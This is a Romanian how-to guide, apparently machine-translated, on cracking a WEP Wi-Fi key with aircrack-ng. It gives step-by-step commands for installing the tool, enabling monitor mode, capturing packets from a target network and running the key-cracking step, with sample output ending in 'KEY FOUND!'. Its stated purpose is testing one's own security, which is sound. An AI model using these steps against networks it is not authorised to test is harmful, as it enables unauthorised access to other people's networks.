cum să spargeți o cheie WEP fără fir folosind Air Crack

acest articol descrie pe scurt pași simpli despre cum să spargeți o cheie WEP fără fir folosind software-ul aircrack-ng. Acest lucru se poate face prin sniffing o rețea fără fir, captarea de pachete criptate și rulează criptare corespunzătoare cracare program în încercarea de a decripta datele capturate. WEP (Wired Equivalent Privacy) este destul de ușor de spart, deoarece folosește o singură cheie pentru a cripta tot traficul.

principiul de bază este că comunicarea între două noduri din rețea se bazează pe adresa MAC. Fiecare gazdă primește pachete destinate numai pentru adresa MAC a propriei interfețe. Același principiu se aplică și rețelelor fără fir. Cu toate acestea, dacă un nod își stabilește propria placă de rețea în modul promiscuu, va primi și pachete care nu sunt adresate pentru propria adresă MAC.

pentru a sparge cheia WEP, un hacker trebuie să captureze pachete de probă care nu sunt destinate propriei interfețe de rețea și să ruleze programul crack pentru a compara cheile de testare cu cheia WEP la pachet cu pachetele capturate în încercarea de decriptare. Cheia care se potrivește pentru a decripta pachetele capturate este cheia utilizată de rețeaua fără fir pentru a cripta întreaga sa comunicare fără fir cu stațiile sale conectate.

în secțiunile următoare, vă vom ghida prin instalarea aircrack-ng pe Linux, apoi vă vom arăta instrucțiunile pas cu pas pentru a sparge o cheie WEP fără fir. Ghidul presupune că aveți instalat placa de rețea fără fir și că acceptă modul monitor.

în acest tutorial veți învăța:

  • cum se instalează aircrack-ng pe distros majore Linux
  • cum de a sparge o cheie WEP fără fir folosind aircrack-ng
cum se sparge o cheie WEP fără fir folosind aircrack-ng

cum se sparge o cheie WEP fără fir folosind aircrack-ng

Cerințe Software și convenții de linie de comandă Linux
Categorie cerințe, convenții sau versiunea Software utilizată
sistem orice distribuție Linux
Software-ul aircrack-ng
altele acces privilegiat la sistemul Linux ca root sau prin comanda sudo.
convenții # – necesită comenzi linux date pentru a fi executate cu privilegii root fie direct ca utilizator root, fie prin utilizarea comenzii sudo
$ – necesită comenzi linux date pentru a fi executate ca utilizator obișnuit non-privilegiat

instalați aircrack-ng pe distribuții Linux majore

pentru a începe, veți avea nevoie de software-ul aircrack-ng instalat pe sistemul dvs. Puteți utiliza comanda corespunzătoare de mai jos pentru a instala programul cu managerul de pachete al sistemului dvs.

pentru a instala aircrack-ng pe Ubuntu, Debian și Linux Mint:

$ sudo apt install aircrack-ng

pentru a instala aircrack-ng pe CentOS, Fedora, AlmaLinux și Red Hat:

$ sudo dnf install aircrack-ng

pentru a instala aircrack-ng pe Arch Linux și Manjaro:

$ sudo pacman -S aircrack-ng

Crack wireless cheie WEP

  1. în primul rând avem nevoie pentru a identifica numele interfeței noastre de rețea fără fir. Dacă placa de rețea fără fir este instalată corect, o comandă iwconfig va dezvălui numele interfeței de rețea fără fir:
    $ iwconfigwlan0 IEEE 802.11 Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dBm

    rezultatul arată că, în cazul nostru, numele interfeței este wlan0.

  2. apoi, activați modul monitor pentru interfața wireless.
    # airmon-ng start wlan0Interface Chipset Driverwlan0 rtl8180 - (monitor mode enabled on mon0)

    rezultatul comenzii vă va da numele noii interfețe virtuale. Acesta tinde să fie mon0.

  3. aruncați rezultatele monitorului într-un terminal, astfel încât să le puteți vedea.
    # airodump-ng mon0

    puteți vedea un tabel de date referitoare la rețelele fără fir din zona dvs. Aveți nevoie doar de informații despre rețeaua pe care doriți să o spargeți. Căutați-l și notați BSSID și canalul pe care se află.

  4. apoi, veți înregistra rezultatele unei scanări într-un fișier. Acest jurnal de captare va fi necesar de Aircrack pentru a rula un atac de forță brută în rețea mai târziu. Pentru a obține captura, veți rula aceeași comandă ca înainte, dar veți specifica BSSID-ul, canalul și locația jurnalului.
    # airodump-ng -c 1 --bssid XX:XX:XX:XX:XX:XX -w Documents/logs/wep-crack mon0

    completați informațiile dvs. reale înainte de a rula comanda și lăsați-o să ruleze.

  5. ca un ultim pas vom sparge cheie WEP prin utilizarea pachetelor capturate și comanda aircrack-ng. Toate pachetele capturate sunt acum stocate în wep-crack-01.cap fișier.
    # aircrack-ng -z wep-crack-01.cap

    producția dvs. ar trebui să arate cam așa:

    Opening wep-crack-01.capRead 450 packets. # BSSID ESSID Encryption 1 00:11:95:9F:FD:F4 linuxconfig.org WEP (210 IVs) 2 00:17:3F:65:2E:5A belkin54g None (0.0.0.0)Index number of target network ?1 Aircrack-ng 1.0 rc1 Tested 485 keys (got 16690 IVs) KB depth byte(vote) 0 9/ 13 00(20992) 06(20736) 27(20736) 3F(20736) A2(20736) 1 0/ 1 F3(28416) A8(23296) 34(21248) 57(21248) A3(21248) 2 0/ 2 8E(25856) BC(23808) 3F(23040) D2(22784) 69(21504) 3 0/ 5 6E(24320) 35(22528) 5A(22016) 95(22016) B8(22016) 4 3/ 4 98(21504) 7C(20992) 84(20992) E0(20992) F0(20992) KEY FOUND! Decrypted correctly: 100%
aircrack-ng încercarea de a sparge cheia WEP pe Linux

aircrack-ng încercarea de a sparge cheia WEP pe Linux

gânduri de închidere

în acest ghid, am văzut cum să instalăm aircrack-ng pe Linux și să folosim software-ul pentru a sparge o cheie WEP fără fir. Amintiți-vă că acest proces ar trebui folosit doar pentru a vă testa propria securitate sau în scopuri educaționale. Utilizarea acestuia în rețeaua altcuiva este ilegală.

Leave a Reply

Lasă un răspuns

Adresa ta de email nu va fi publicată.